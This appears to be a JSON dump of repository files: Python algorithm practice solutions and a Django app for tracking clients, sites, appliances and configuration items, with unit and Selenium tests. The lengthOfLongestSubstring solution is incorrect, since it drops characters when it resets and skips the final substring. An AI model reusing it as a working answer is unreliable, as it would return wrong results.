[ { "alpha_fraction": 0.5634408593177795, "alphanum_fraction": 0.5677419304847717, "avg_line_length": 21.190475463867188, "blob_id": "75896263fa2cfcabfbfae320c45f5e88a02a3640", "content_id": "e7552fdd7654c2ab799615d4a398b9c151590b24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 65, "num_lines": 21, "path": "/19Aug2019/Solution.py", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "import math\n\n\nclass Solution:\n\n def lengthOfLongestSubstring(self, s):\n # Fill this in.\n indexDict = {}\n substring = ''\n max_length = 0\n for c in s:\n if c not in indexDict:\n indexDict[c] = 1\n substring += c\n else:\n max_length = max(len(substring), max_length)\n indexDict = {}\n substring = ''\n return max_length\n\nprint(Solution().lengthOfLongestSubstring('abrkaabcdefghijjxxx'))" }, { "alpha_fraction": 0.4725568890571594, "alphanum_fraction": 0.515394926071167, "avg_line_length": 24.724138259887695, "blob_id": "dac83d097c060a29090b86f8cdf242c3d56a718c", "content_id": "45c174a37a1b8f28f291ffc15055e7bbbeee49a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 747, "license_type": "no_license", "max_line_length": 77, "num_lines": 29, "path": "/18Aug2019/Solution.py", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "from ListNode import ListNode\n\n\nclass Solution:\n\n def addTwoNumbers(self, l1, l2, c=0):\n\n result = ListNode(0)\n result.val = (l1.val + l2.val) + c\n\n if result.val >= 10:\n result.val = l1.val + l2.val - 10 + c\n c = 1 # more than 9, carry digit = 1\n else:\n c = 0 # less than 10, carry digit = 0\n\n if l1.next is None and l2.next is None:\n if c != 0:\n result.next = self.addTwoNumbers(ListNode(0), ListNode(0), c)\n return result\n\n if l1.next is None:\n l1.next = ListNode(0)\n if l2.next is None:\n l2.next = ListNode(0)\n\n result.next = self.addTwoNumbers(l1.next, l2.next, c)\n\n return result\n\n" }, { "alpha_fraction": 0.5665295124053955, "alphanum_fraction": 0.6104252338409424, "avg_line_length": 28.1200008392334, "blob_id": "f2c32d048ce9dfff8867d56dfda026334cde4961", "content_id": "e57332d8c2635a131ce71a31f5e81e0e667777c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "no_license", "max_line_length": 101, "num_lines": 25, "path": "/18Aug2019/Test.py", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "import random\nfrom Helper import *\nfrom colorama import Style, Fore, init\n\ninit()\n\nn = 10000\nn_success = 0\nn_failure = 0\nprint(f\"{Style.BRIGHT}Self generating {n} test cases: {Style.RESET_ALL}\")\n\nfor i in range(n):\n num1 = random.randint(1, 100000)\n num2 = random.randint(1, 100000)\n result = NodeToNumber(Solution().addTwoNumbers(NumberToNode(str(num1)), NumberToNode(str(num2))))\n print(f\"{i+1}: {num1} + {num2} = {result}\")\n if num1 + num2 == result:\n print(f\"{Fore.LIGHTGREEN_EX}passed\")\n n_success += 1\n else:\n print(f\"{Fore.RED}failed\")\n n_failure += 1\n print(f\"{Fore.RESET}------------------------------\")\n\nprint(f\"{Fore.CYAN}Success: {n_success}\\nFailure: {n_failure}\")\n\n" }, { "alpha_fraction": 0.5761494040489197, "alphanum_fraction": 0.6034482717514038, "avg_line_length": 20.121212005615234, "blob_id": "c0c3304bd54ca1d1adabefdab525e7ba1ec85993", "content_id": "9ee0d6202d607f93901684e9abee8f5a3abe1ef5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 696, "license_type": "no_license", "max_line_length": 46, "num_lines": 33, "path": "/18Aug2019/Helper.py", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "from ListNode import ListNode\nfrom Solution import Solution\n\ndef NodeToNumber(node, n=0, c=0):\n n += pow(10, c) * node.val\n c += 1\n if node.next is None:\n return n\n else:\n return NodeToNumber(node.next, n, c)\n\ndef NumberToNode(str_num):\n node = ListNode(0)\n if len(str_num) == 0:\n return node\n else:\n node.val = int(str_num[-1])\n node.next = NumberToNode(str_num[:-1])\n return node\n\n\n# l1 = ListNode(9)\n#\n# l2 = ListNode(5)\n# l2.next = ListNode(6)\n# l2.next.next = ListNode(5)\n#\n# result = Solution().addTwoNumbers(l1, l2)\n# print(NodeToNumber(result))\n#\n# while result is not None:\n# print(result.val)\n# result = result.next" }, { "alpha_fraction": 0.8363636136054993, "alphanum_fraction": 0.8363636136054993, "avg_line_length": 26.5, "blob_id": "aa555ba6461d229c85feff477ebca91338872457", "content_id": "d26b24bc025b9f1f6f8361ec5678479aa1f61e01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 55, "license_type": "no_license", "max_line_length": 40, "num_lines": 2, "path": "/README.md", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "# DailyCoding\nOnly used for solving algorithm problems\n" } ]
5
GlauberGoncalves/scanner
https://github.com/GlauberGoncalves/scanner
62e6c354331abbf099791c9e8c17eb30602baf57
f62dbbab1c2b65730f1d89537f33b7d63336a3b0
e4c37870312494e9f39de90af39ed29dc145dfe5
refs/heads/master
2021-01-11T09:47:07.912143
2017-01-02T19:35:01
2017-01-02T19:35:01
77,665,425
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.44175440073013306, "alphanum_fraction": 0.48140349984169006, "avg_line_length": 26.95098114013672, "blob_id": "d082266e47bb515d9616d4be92d69250a6fad26b", "content_id": "9992a523c25966c27f9ff3a8acc1e80f9a3f5a22", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2858, "license_type": "permissive", "max_line_length": 82, "num_lines": 102, "path": "/scanner.py", "repo_name": "GlauberGoncalves/scanner", "src_encoding": "UTF-8", "text": "from tkinter import *\nimport socket\nimport os, platform\n\n#\n# Função ping retorna true se IP estiver ativo na rede e False se não estiver\n#-------------------------------------------------------------------------------#\n\ndef ping(host): \n # ping de acordo com SO\n ping_str = \"-n 1\" if platform.system().lower()==\"windows\" else \"-c 1\"\n\n # Ping\n relatorio = (os.popen(\"ping -n 1 \"+host).read())\n if (relatorio[-5]+relatorio[-4]) != 'da':\n return True\n else: return False\n#\n# retorna uma lista com cada valor do ip\n#-------------------------------------------------------------------------------#\ndef iphost(host):\n ip = socket.gethostbyname(host)\n ip = ip.split('.')\n return ip\n#\n# \n#-------------------------------------------------------------------------------#\ndef verifAparelho(ip,dmin,dmax,cmin,cmax):\n if(ip[0] == '10'):\n for i in range(dmin,dmax+1):\n ip[3] = str(i)\n mont = ip[0]+\".\"+ip[1]+\".\"+ip[2]+\".\"+ip[3]\n print(mont)\n if(ping(mont)):\n visor.insert('insert',\"AP ativo: \" + mont + \"\\n\")\n janela.update() \n else:\n for i in range(cmin,cmax+1): \n ip[3] = str(i)\n mont = ip[0]+\".\"+ip[1]+\".\"+ip[2]+\".\"+ip[3]\n print(mont)\n if(ping(mont)):\n visor.insert('insert',\"AP ativo: \" + mont + \"\\n\")\n janela.update()\n\n#\n# \n#-------------------------------------------------------------------------------#\n \n#\n# Layout do sistema\n#-------------------------------------------------------------------------------#\n\ndef verificaAP():\n ip = iphost(et.get())\n verifAparelho(ip,161,165,80,86)\n\ndef verificaRD():\n ip = iphost(et.get())\n verifAparelho(ip,166,175,87,89)\n\ndef verificaTM():\n ip = iphost(et.get())\n verifAparelho(ip,176,189,234,246)\n\ndef verificaTD():\n ip = iphost(et.get())\n verificaAP()\n verificaTM()\n verificaRD()\n\n# configuração da janela\njanela = Tk()\njanela.geometry(\"485x400+400+200\")\njanela[\"bg\"] = \"#2196f3\"\njanela.title(\"Scan de Rede - Nimal Tecnologia\")\n\n# config botões\nbtn1 = Button(janela, text=\"Access point\", bg=\"white\", command=verificaAP)\nbtn2 = Button(janela, text=\"Rádio Frequencia\", bg=\"white\", command=verificaRD)\nbtn3 = Button(janela, text=\"Terminal de consulta\", bg=\"white\", command=verificaTM)\nbtn4 = Button(janela, text=\"Todos\", bg=\"white\", command=verificaTD)\n\nbtn1.place(x=10, y=40)\nbtn2.place(x=90, y=40)\nbtn3.place(x=195, y=40)\nbtn4.place(x=320, y=40)\n\n# label\nlb = Label(janela, text=\"Número da loja:\")\nlb.place(x=10, y=10)\n\nvisor = Text(janela, width=\"58\", height=20)\nvisor.place(x=10, y=70)\n\n\n# entry\net = Entry(janela, width=5)\net.place(x=110,y=10)\n\njanela.mainloop()\n#------------------------------------------------------------------------------#" }, { "alpha_fraction": 0.774193525314331, "alphanum_fraction": 0.774193525314331, "avg_line_length": 14.5, "blob_id": "a208c4f381a214a796849f386b50dbdf0c988257", "content_id": "500543f404c9177cf092d9b36a5f48f9e67e7f83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31, "license_type": "permissive", "max_line_length": 20, "num_lines": 2, "path": "/README.md", "repo_name": "GlauberGoncalves/scanner", "src_encoding": "UTF-8", "text": "# scanner\nScan de rede simples\n" } ]
2
DiegoVilela/internalize
https://github.com/DiegoVilela/internalize
5a55b3b91947e20a7315125e15a010e951e02c42
d34d850f98c408974d10633bf7aaddcf23feb313
5e803fee42fa1f6cdbfd485f2c8989ad826c2b98
refs/heads/main
2023-05-04T09:01:02.209806
2021-05-26T20:07:02
2021-05-26T20:07:02
331,701,830
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7084639668464661, "alphanum_fraction": 0.7084639668464661, "avg_line_length": 29.380952835083008, "blob_id": "814a4651d54bad1f92faae7f1c2d5edf28525b1b", "content_id": "b10aedbd50c72491a774bd46f8d320679ac1e652", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 638, "license_type": "no_license", "max_line_length": 110, "num_lines": 21, "path": "/cis/mixins.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.contrib.auth.mixins import UserPassesTestMixin\n\n\nclass UserApprovedMixin(UserPassesTestMixin):\n \"\"\"\n Deny access to unapproved users.\n \"\"\"\n def test_func(self):\n return self.request.user.is_authenticated and self.request.user.is_approved\n\n\nclass AddClientMixin:\n \"\"\"\n Add the client to be saved on create views.\n\n Override form_valid() of CreateView.\n https://docs.djangoproject.com/en/stable/topics/class-based-views/generic-editing/#models-and-request-user\n \"\"\"\n def form_valid(self, form):\n form.instance.client = self.request.user.client\n return super().form_valid(form)\n" }, { "alpha_fraction": 0.5711265206336975, "alphanum_fraction": 0.5779396295547485, "avg_line_length": 34.032920837402344, "blob_id": "dbaef71e7c734e0d5b5ebbdc5a17ce1d66f2e990", "content_id": "4db781f5652dccf58b12a3b80ccf6c292769e1bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8513, "license_type": "no_license", "max_line_length": 99, "num_lines": 243, "path": "/cis/tests/tests_views.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from datetime import timedelta\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom django.utils import timezone\nfrom django.test import TestCase\nfrom django.shortcuts import reverse\n\nfrom ..models import Client, Place, Appliance, Manufacturer, CI, Contract\nfrom accounts.models import User\n\n\n@dataclass\nclass ListInfo:\n \"\"\"\n Wraps the details of each test.\n\n Applied to Place, Appliance, and CI.\n \"\"\"\n\n message: str\n context_object_name: str\n template_name: str\n lookup_text: str\n letter: str = 'A'\n\n @property\n def contains(self):\n return f'{self.lookup_text}{self.letter}'\n\n @property\n def not_contains(self):\n return f\"{self.lookup_text}{'B' if self.letter == 'A' else 'A'}\"\n\n\nclass PlaceApplianceAndCIViewTest(TestCase):\n \"\"\"\n Test CI, Place and Appliance views.\n \"\"\"\n\n users = {}\n places = {}\n appliances = {}\n\n @classmethod\n def setUpTestData(cls):\n \"\"\"\n Set up the database to be used in all testes in this class.\n\n Client A and Client B will have their respective User, CI, and Place.\n cls.users = {'a': user_A, 'b': user_B}\n \"\"\"\n\n manufacturer = Manufacturer.objects.create(name='Cisco')\n contract = create_contract()\n for letter in {'A', 'B'}:\n client = Client.objects.create(name=f'Client {letter}')\n place = Place.objects.create(client=client, name=f'Place Client {letter}')\n appliance = create_appliance(client, manufacturer, letter)\n create_ci(client, place, letter, contract)\n user = User.objects.create_user(f'user_{letter}', password='faith', client=client)\n cls.users.update({letter: user})\n cls.places.update({letter: place})\n cls.appliances.update({letter: appliance})\n cls.manufacturer = manufacturer\n cls.contract = contract\n\n # Maps the details of the tests applied to\n # Place, Appliance, and, CI list views, respectively.\n cls.list_details = {\n reverse('cis:manage_client_places'): ListInfo(\n 'No place was found.',\n 'formset',\n 'cis/manage_client_places.html',\n 'Place Client ',\n ),\n reverse('cis:appliance_list'): ListInfo(\n 'No appliance was found.',\n 'appliance_list',\n 'cis/appliance_list.html',\n 'SERIAL_CLIENT_',\n ),\n reverse('cis:ci_list', args=(0,)): ListInfo(\n 'No configuration item was found.',\n 'ci_list',\n 'cis/ci_list.html',\n 'HOST_',\n ),\n }\n\n def test_show_correct_items_by_client(self):\n\n # for client 'A' and client 'B'\n for k, user in self.users.items():\n self.client.force_login(user)\n\n # test Place, Appliance, and CI\n for url, test in self.list_details.items():\n test.letter = k\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, test.template_name)\n self.assertEqual(len(response.context[test.context_object_name]), 1)\n self.assertContains(response, test.contains, count=1)\n self.assertNotContains(response, test.not_contains)\n\n self.client.logout()\n\n def test_raise_exception_on_unapproved_user(self):\n user = self.users['A']\n user.client = None\n user.save()\n self.client.force_login(user)\n\n # test Place, Appliance, and CI\n for url in self.list_details.keys():\n response = self.client.get(url)\n self.assertIsNone(response.context)\n self.assertEqual(response.status_code, 403)\n\n def test_not_found(self):\n client = Client.objects.create(name=f'Client C')\n user = User.objects.create_user(f'user_c', password='faith', client=client)\n self.client.force_login(user)\n\n # test Place, Appliance, and CI\n for url, test in self.list_details.items():\n response = self.client.get(url)\n self.assertContains(response, test.message, count=1)\n self.assertEqual(len(response.context[test.context_object_name]), 0)\n self.assertNotContains(response, test.not_contains)\n\n def test_create(self):\n self.client.force_login(self.users['A'])\n\n # map urls to info that needs to be checked\n CreateInfo = namedtuple('CreateInfo', ['data', 'template_name', 'contains'])\n details = {\n 'cis:place_create': CreateInfo(\n {'name': \"New Place\"},\n 'cis/place_form.html',\n ['The place New Place was created successfully.'],\n ),\n 'cis:appliance_create': CreateInfo(\n {\n 'serial_number': 'NEW_SERIAL',\n 'manufacture': self.manufacturer,\n 'model': 'ABC123',\n 'virtual': True,\n },\n 'cis/appliance_form.html',\n ['NEW_SERIAL', 'Cisco', 'ABC123'],\n ),\n 'cis:ci_create': CreateInfo(\n {\n 'place': self.places['A'].id,\n 'appliances': (self.appliances['A'].id,),\n 'hostname': 'NEW_HOST',\n 'ip': '10.10.10.254',\n 'description': 'New Configuration Item',\n 'deployed': True,\n 'business_impact': 'high',\n 'contract': self.contract,\n },\n 'cis/ci_form.html',\n ['NEW_HOST', self.appliances['A'].serial_number],\n )\n }\n # test Place, Appliance, and CI\n for url, info in details.items():\n response = self.client.post(reverse(url), info.data, follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, info.template_name)\n for text in info.contains:\n self.assertContains(response, text, count=1)\n\n\nclass AdminViewTest(TestCase):\n fixtures = ['all.json']\n\n @classmethod\n def setUpTestData(cls):\n cls.user = User.objects.get(username='admin')\n\n def setUp(self):\n self.client.force_login(self.user)\n\n def test_mark_selected_cis_as_approved_action(self):\n data = {\n 'action': 'approve_selected_cis',\n '_selected_action': [1, 2],\n }\n response = self.client.post(reverse('admin:cis_ci_changelist'), data, follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'The selected CIs were approved successfully.')\n self.assertTemplateUsed(response, 'admin/change_list.html')\n\n def test_user_display_approved(self):\n response = self.client.get(reverse('admin:accounts_user_changelist'), follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(self.user.is_approved)\n\n def test_client_places_links(self):\n response = self.client.get(reverse('admin:cis_client_changelist'), follow=True)\n self.assertEqual(response.status_code, 200)\n for place in Place.objects.all():\n self.assertContains(response, place.name)\n\n def test_appliance_manufacturer_links(self):\n response = self.client.get(reverse('admin:cis_appliance_changelist'), follow=True)\n self.assertEqual(response.status_code, 200)\n for manufacturer in Manufacturer.objects.exclude(appliance=None):\n self.assertContains(response, manufacturer.name)\n\n\ndef create_appliance(client, manufacturer, letter):\n return Appliance.objects.create(\n client=client,\n serial_number=f'SERIAL_CLIENT_{letter}',\n manufacturer=manufacturer,\n model='ABC123',\n virtual=True,\n )\n\n\ndef create_contract():\n return Contract.objects.create(\n name='CONTRACT',\n begin=timezone.now(),\n end=timezone.now() + timedelta(days=356),\n description='Contract Description',\n )\n\n\ndef create_ci(client, place, letter, contract):\n CI.objects.create(\n client=client,\n place=place,\n hostname=f'HOST_{letter}',\n ip='10.10.20.20',\n description=f'Configuration Item {letter}',\n deployed=True,\n contract=contract,\n )\n" }, { "alpha_fraction": 0.6340469121932983, "alphanum_fraction": 0.6340469121932983, "avg_line_length": 24.8157901763916, "blob_id": "20bb8526d1846f37bcc91019403a18a39c19d38d", "content_id": "acd6c1e65664368b190280ea4b59037b7a4ac8d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 981, "license_type": "no_license", "max_line_length": 67, "num_lines": 38, "path": "/cis/forms.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django import forms\n\nfrom .models import CI, Place, Appliance, Client\n\n\nclass UploadCIsForm(forms.Form):\n file = forms.FileField()\n\n\nclass CIForm(forms.ModelForm):\n appliances = forms.ModelMultipleChoiceField(queryset=None)\n place = forms.ModelChoiceField(queryset=None)\n\n def __init__(self, *args, **kwargs):\n self.client = kwargs.pop('client')\n super().__init__(*args, **kwargs)\n self.fields['appliances'] = forms.ModelMultipleChoiceField(\n queryset=Appliance.objects.filter(client=self.client)\n )\n self.fields['place'] = forms.ModelChoiceField(\n queryset=Place.objects.filter(client=self.client)\n )\n\n class Meta:\n model = CI\n exclude = ('client', 'status', 'pack')\n\n\nclass ApplianceForm(forms.ModelForm):\n class Meta:\n model = Appliance\n exclude = ('client',)\n\n\nclass PlaceForm(forms.ModelForm):\n class Meta:\n model = Place\n fields = ('client',)\n" }, { "alpha_fraction": 0.6436181664466858, "alphanum_fraction": 0.6503303050994873, "avg_line_length": 37.785125732421875, "blob_id": "dc5780f5eab0742fa737465e49968cce438e8afc", "content_id": "a932423ffa4694be50ed465137017df331a8514e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9386, "license_type": "no_license", "max_line_length": 98, "num_lines": 242, "path": "/cis/tests/tests_functionals.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "\"\"\"\nFunctional tests.\n\nRequires Selenium and geckodriver.\n\"\"\"\n\nfrom django.conf import settings\nfrom django.test import tag\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium.webdriver.firefox.webdriver import WebDriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom accounts.models import User\nfrom ..models import Client, CI\nfrom ..urls import app_name\n\nLOGIN = '[email protected]'\nPASSWORD = 'UnQt5uGgjErbwkN'\nSESSION_COOKIE = settings.SESSION_COOKIE_NAME\n\n\nclass CommonTestMixin:\n \"\"\"\n Add common fixtures and methods to TestCases.\n\n A user is logged in before each test.\n\n Place the mixin early in the MRO in order to isolate\n setUpClass()/tearDownClass().\n \"\"\"\n\n fixtures = ['all.json']\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.driver = WebDriver()\n\n def setUp(self):\n # Login via Django\n user = User.objects.get(pk=1)\n self.client.force_login(user)\n cookie = self.client.cookies[SESSION_COOKIE]\n\n # Selenium will use the current domain to set the cookie\n self.driver.get(f'{self.live_server_url}/any-404')\n self.driver.add_cookie({\n 'name': SESSION_COOKIE,\n 'value': cookie.value,\n 'secure': False,\n })\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n super().tearDownClass()\n\n @staticmethod\n def _get_alert_success_text(driver: WebDriver) -> str:\n msg = WebDriverWait(driver, 2).until(\n lambda d: d.find_element(By.CSS_SELECTOR, '.alert-success')\n )\n return msg.text\n\n\n@tag('functional')\nclass LoginTest(CommonTestMixin, StaticLiveServerTestCase):\n\n def setUp(self):\n pass\n\n def test_login_unapproved_user_shows_alert(self):\n user = User.objects.get(pk=1)\n user.client = None\n user.save()\n\n self._login_user(LOGIN)\n message = self.driver.find_element(By.CSS_SELECTOR, '.alert-warning')\n self.assertEqual(\n 'Your account needs to be approved. Please contact you Account Manager.',\n message.text[2:]\n )\n self._logout()\n\n def test_login_approved_user_does_not_show_alert(self):\n self._login_user(LOGIN)\n with self.assertRaises(NoSuchElementException):\n self.driver.find_element(By.CSS_SELECTOR, '.alert-warning')\n home = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(home.text, 'Homepage')\n self._logout()\n\n def _login_user(self, email):\n self.driver.get(f'{self.live_server_url}/accounts/login/')\n username_input = self.driver.find_element(By.ID, 'id_login')\n username_input.send_keys(email)\n password_input = self.driver.find_element(By.ID, 'id_password')\n password_input.send_keys(PASSWORD)\n self.driver.find_element(By.XPATH, '//input[@type=\"submit\"]').click()\n\n def _logout(self):\n self.driver.find_element(By.LINK_TEXT, 'Logout').click()\n self.driver.find_element(By.XPATH, '//button[@type=\"submit\"]').click()\n\n\n@tag('functional')\nclass SiteTest(CommonTestMixin, StaticLiveServerTestCase):\n \"\"\"Test all features related to the Place model.\"\"\"\n\n def test_create_place(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/place/create/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Place')\n\n new_place_name = 'Paulista'\n name = self.driver.find_element(By.ID, 'id_name')\n name.send_keys(new_place_name)\n description = self.driver.find_element(By.ID, 'id_description')\n description.send_keys('Place description' + Keys.ENTER)\n\n msg = self._get_alert_success_text(self.driver)\n self.assertTrue(f'The place {new_place_name} was created successfully.' in msg)\n\n def test_viewing_place(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/place/1')\n new_place = self.driver.find_element(By.ID, 'id_name')\n self.assertEqual(new_place.get_attribute('value'), 'Main')\n\n def test_listing_places(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/places/')\n for i in range(2):\n place = self.driver.find_element(By.ID, f'id_place_set-{i}-name')\n self.assertTrue(place.get_attribute('value') in {'Main', 'Branch'})\n\n def test_deleting_place(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/places/')\n self.driver.find_element(By.ID, 'id_place_set-0-DELETE').click()\n self.driver.find_element(By.XPATH, '//input[@value=\"Save\"]').click()\n msg = self._get_alert_success_text(self.driver)\n self.assertTrue('The places were updated successfully.' in msg)\n\n\n@tag('functional')\nclass ApplianceTest(CommonTestMixin, StaticLiveServerTestCase):\n \"\"\"Test all features related to the Appliance model.\"\"\"\n\n def test_create_appliance(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/appliance/create/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Appliance')\n\n the_serial_number = 'DEF456'\n serial = self.driver.find_element(By.ID, 'id_serial_number')\n serial.send_keys(the_serial_number)\n\n manufacturer = self.driver.find_element(By.ID, 'id_manufacturer')\n manufacturer_select = Select(manufacturer)\n manufacturer_select.select_by_index(1)\n\n model = self.driver.find_element(By.ID, 'id_model')\n model.send_keys('C9000')\n\n serial = self.driver.find_element(By.ID, 'id_serial_number')\n self.assertEqual(serial.get_attribute('value'), the_serial_number)\n\n def test_viewing_appliance(self):\n _id = 3\n self.driver.get(f'{self.live_server_url}/{app_name}/appliance/{_id}')\n serial = self.driver.find_element(By.ID, 'id_serial_number')\n self.assertEqual(serial.get_attribute('value'), f'SERIAL{_id}')\n\n def test_listing_appliances(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/appliances/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Appliances')\n\n serials = self.driver.find_elements(By.CSS_SELECTOR, 'td>a')\n for i, serial in enumerate(serials):\n self.assertEqual(serial.text, f'SERIAL{i + 1}')\n\n def test_view_appliance_from_listing(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/appliances/')\n serial_origin = self.driver.find_element(By.CSS_SELECTOR, 'td>a')\n serial = serial_origin.text\n serial_origin.click()\n serial_target = self.driver.find_element(By.ID, 'id_serial_number')\n self.assertEqual(serial, serial_target.get_attribute('value'))\n\n\n@tag('functional')\nclass CITest(CommonTestMixin, StaticLiveServerTestCase):\n \"\"\"Test all features related to the CI model.\"\"\"\n\n def test_create_ci(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/ci/create/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Configuration Item')\n\n self.driver.find_element(By.ID, 'id_hostname').send_keys('NEW_HOST')\n place_select = Select(self.driver.find_element(By.ID, 'id_place'))\n place_select.select_by_value('1')\n self.driver.find_element(By.ID, 'id_ip').send_keys('10.10.20.20')\n contract_select = Select(self.driver.find_element(By.ID, 'id_contract'))\n contract_select.select_by_index(1)\n self.driver.find_element(By.ID, 'id_description').send_keys('Some text.')\n appliances_select = Select(self.driver.find_element(By.ID, 'id_appliances'))\n appliances_select.select_by_value('1')\n appliances_select.select_by_value('2')\n self.driver.find_element(By.ID, 'id_username').send_keys('admin')\n self.driver.find_element(By.ID, 'id_password').send_keys('123')\n self.driver.find_element(By.ID, 'id_enable_password').send_keys('enable123' + Keys.RETURN)\n\n msg = self._get_alert_success_text(self.driver)\n self.assertTrue('success' in msg)\n\n def test_viewing_ci(self):\n ci = CI.objects.get(pk=3)\n self.driver.get(f'{self.live_server_url}/{app_name}/ci/3')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, str(ci))\n\n def test_listing_cis(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/cis/0/')\n h1 = self.driver.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(h1.text, 'Configuration Items Created')\n\n cis = self.driver.find_elements(By.CSS_SELECTOR, 'td>a')\n for hostname in cis:\n hostnames = ('CORE', 'FLW2', 'FLW3')\n self.assertTrue(hostname.text in hostnames)\n\n def test_view_ci_from_listing(self):\n self.driver.get(f'{self.live_server_url}/{app_name}/cis/0/')\n ci_origin = self.driver.find_element(By.CSS_SELECTOR, 'td>a')\n ci_hostname_origin = ci_origin.text\n ci_origin.click()\n ci_hostname_target = self.driver.find_element(By.ID, 'hostname')\n self.assertEqual(ci_hostname_target.text, ci_hostname_origin)\n" }, { "alpha_fraction": 0.7153075933456421, "alphanum_fraction": 0.7181687951087952, "avg_line_length": 30.772727966308594, "blob_id": "8796fda7e000e6a7392253fb4d27530068c8ff34", "content_id": "05e9fc3d41929136b1ba2a092147265faed7c3fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "no_license", "max_line_length": 102, "num_lines": 22, "path": "/accounts/models.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import AbstractUser, UserManager\n\n\nclass UserClientManager(UserManager):\n def get_queryset(self):\n return super().get_queryset().select_related('client')\n\n\nclass User(AbstractUser):\n client = models.ForeignKey('cis.Client', on_delete=models.CASCADE, blank=True, null=True)\n\n # modify the user manager's initial QuerySet to join the Client\n # https://docs.djangoproject.com/en/3.1/topics/db/managers/#modifying-a-manager-s-initial-queryset\n objects = UserClientManager()\n\n def __str__(self):\n return self.email\n\n @property\n def is_approved(self):\n return bool(self.client) or self.is_superuser\n" }, { "alpha_fraction": 0.6798714995384216, "alphanum_fraction": 0.680942177772522, "avg_line_length": 31.20689582824707, "blob_id": "b62710773f1bb0869b7b0ca944c1956a3dfdaaf2", "content_id": "92d325c61f2ef464c3e4ef731789ef7f17417312", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 934, "license_type": "no_license", "max_line_length": 76, "num_lines": 29, "path": "/accounts/tests.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom django.db.utils import IntegrityError\n\nfrom .models import User\nfrom cis.models import Client\n\n\nclass UserTest(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.user = User.objects.create_user(username='new', email='[email protected]')\n\n def test_is_approved_returns_true_when_user_has_client(self):\n client = Client.objects.create(name='New Client')\n self.user.client = client\n self.assertTrue(self.user.is_approved)\n\n def test_is_approved_returns_false_when_user_has_no_client(self):\n self.user.client = None\n self.assertFalse(self.user.is_approved)\n\n def test_user_as_string_returns_email(self):\n self.assertEqual(str(self.user), self.user.email)\n\n def test_duplicate_name_raises_exception(self):\n with self.assertRaises(IntegrityError):\n self.user.pk = None\n self.user.save()\n self.user.pk = 1\n" }, { "alpha_fraction": 0.6795735955238342, "alphanum_fraction": 0.6892929673194885, "avg_line_length": 26.14468002319336, "blob_id": "47e68ec1f904bb39f8f8903b6a5be9a682a992c8", "content_id": "e17d416d7621e6f95a0202eb60f60b021dfcac43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6379, "license_type": "no_license", "max_line_length": 106, "num_lines": 235, "path": "/internalize/settings.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": 